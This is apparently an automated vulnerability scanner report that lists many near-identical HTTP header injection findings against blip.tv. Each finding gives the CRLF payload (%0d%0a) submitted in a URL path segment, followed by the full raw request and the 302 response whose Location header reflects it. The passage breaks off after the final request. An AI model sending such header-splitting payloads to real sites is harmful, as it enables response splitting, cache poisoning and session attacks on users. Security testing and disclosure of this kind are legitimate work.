GET /play/d91e6%0d%0ae9cbf33725c HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/d91e6 e9cbf33725c Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:45 GMT X-Varnish: 1324530160 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/d91e6 e9cbf33725c">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 4f9cc%0d%0a40527a2d90f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4f9cc%0d%0a40527a2d90f/AYKY31UC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/4f9cc 40527a2d90f/AYKY31UC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:48 GMT X-Varnish: 1248908684 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/4f9cc 40527a2d90f/AYKY31UC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 2679a%0d%0af81e182e5a5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/2679a%0d%0af81e182e5a5/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/2679a f81e182e5a5/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:49 GMT X-Varnish: 2146048843 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/2679a f81e182e5a5/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 52d50%0d%0a0aea56bf3eb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /52d50%0d%0a0aea56bf3eb/AYKZp2EC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/52d50 0aea56bf3eb/AYKZp2EC Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:42 GMT X-Varnish: 1248907589 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/52d50 0aea56bf3eb/AYKZp2EC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 25f47%0d%0ae8af83f81dc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/25f47%0d%0ae8af83f81dc HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/25f47 e8af83f81dc Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 1248907651 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/25f47 e8af83f81dc">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b76c%0d%0a77c94b9702c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b76c%0d%0a77c94b9702c/AYKZp2EC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/7b76c 77c94b9702c/AYKZp2EC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 1025269306 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/7b76c 77c94b9702c/AYKZp2EC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d2638%0d%0a6ef855d3c8b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/d2638%0d%0a6ef855d3c8b/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/d2638 6ef855d3c8b/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 2146047947 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/d2638 6ef855d3c8b/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 8d0e4%0d%0a0170a13e0d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8d0e4%0d%0a0170a13e0d6/AYKc0AIC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/8d0e4 0170a13e0d6/AYKc0AIC Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:40 GMT X-Varnish: 1498218747 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/8d0e4 0170a13e0d6/AYKc0AIC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 6d2e1%0d%0ae5aa42e7cd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/6d2e1%0d%0ae5aa42e7cd7 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/6d2e1 e5aa42e7cd7 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 1248907258 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/6d2e1 e5aa42e7cd7">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload af3c1%0d%0a7e3157c4790 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /af3c1%0d%0a7e3157c4790/AYKc0AIC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/af3c1 7e3157c4790/AYKc0AIC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:40 GMT X-Varnish: 1324529371 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/af3c1 7e3157c4790/AYKc0AIC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 88c5c%0d%0a4123e2554df was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/88c5c%0d%0a4123e2554df/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/88c5c 4123e2554df/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 1248907308 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/88c5c 4123e2554df/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 30765%0d%0addbbb830a25 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /30765%0d%0addbbb830a25/AYKc93MC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/30765 ddbbb830a25/AYKc93MC Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:40 GMT X-Varnish: 2146047415 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/30765 ddbbb830a25/AYKc93MC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bbbd9%0d%0a90a0f111b1d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/bbbd9%0d%0a90a0f111b1d HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/bbbd9 90a0f111b1d Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:40 GMT X-Varnish: 1324529310 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/bbbd9 90a0f111b1d">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload fb325%0d%0a32ab4049851 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fb325%0d%0a32ab4049851/AYKc93MC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/fb325 32ab4049851/AYKc93MC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 1324529851 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/fb325 32ab4049851/AYKc93MC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 2f6c3%0d%0a2b45d599e82 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/2f6c3%0d%0a2b45d599e82/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/2f6c3 2b45d599e82/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 2146047961 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/2f6c3 2b45d599e82/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload bb0b6%0d%0ab0c1664273c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /bb0b6%0d%0ab0c1664273c/AYKcqGYC HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/bb0b6 b0c1664273c/AYKcqGYC Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 1324529445 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/bb0b6 b0c1664273c/AYKcqGYC" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload f589d%0d%0ad979631150a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/f589d%0d%0ad979631150a HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/play/f589d d979631150a Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 1324529500 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/f589d d979631150a">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e21a2%0d%0a89670705052 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e21a2%0d%0a89670705052/AYKcqGYC/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e21a2 89670705052/AYKcqGYC/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:42 GMT X-Varnish: 1025269189 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e21a2 89670705052/AYKcqGYC/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 68177%0d%0a9b57f6a14de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/68177%0d%0a9b57f6a14de/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/68177 9b57f6a14de/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:43 GMT X-Varnish: 344229413 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/68177 9b57f6a14de/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f9f0%0d%0abcd2357f9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f9f0%0d%0abcd2357f9fd/AYKcqGYD HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/6f9f0 bcd2357f9fd/AYKcqGYD Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:35 GMT X-Varnish: 1498217998 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/6f9f0 bcd2357f9fd/AYKcqGYD" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload ed49c%0d%0a7dc169f519e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/ed49c%0d%0a7dc169f519e HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/play/ed49c 7dc169f519e Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 344228345 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/ed49c 7dc169f519e">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 2359b%0d%0a2068ebd89cb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2359b%0d%0a2068ebd89cb/hK5wgpzTKAI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/2359b 2068ebd89cb/hK5wgpzTKAI Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1248906534 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/2359b 2068ebd89cb/hK5wgpzTK ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d21e3%0d%0a40709f5e0a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/d21e3%0d%0a40709f5e0a0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/play/d21e3 40709f5e0a0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1324528736 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/d21e3 40709f5e0a0">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 7038c%0d%0afea36d9b505 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7038c%0d%0afea36d9b505/hK5wgpzTKAI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/7038c fea36d9b505/hK5wgpzTKAI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 295 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1274883062 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/7038c fea36d9b505/hK5wgpzTK ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 6cc24%0d%0ae23d6c3b0c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/6cc24%0d%0ae23d6c3b0c5/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/6cc24 e23d6c3b0c5/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:37 GMT X-Varnish: 344228475 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/6cc24 e23d6c3b0c5/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 2e516%0d%0af8e22e5a25d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2e516%0d%0af8e22e5a25d/hbdrgpvFPAI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
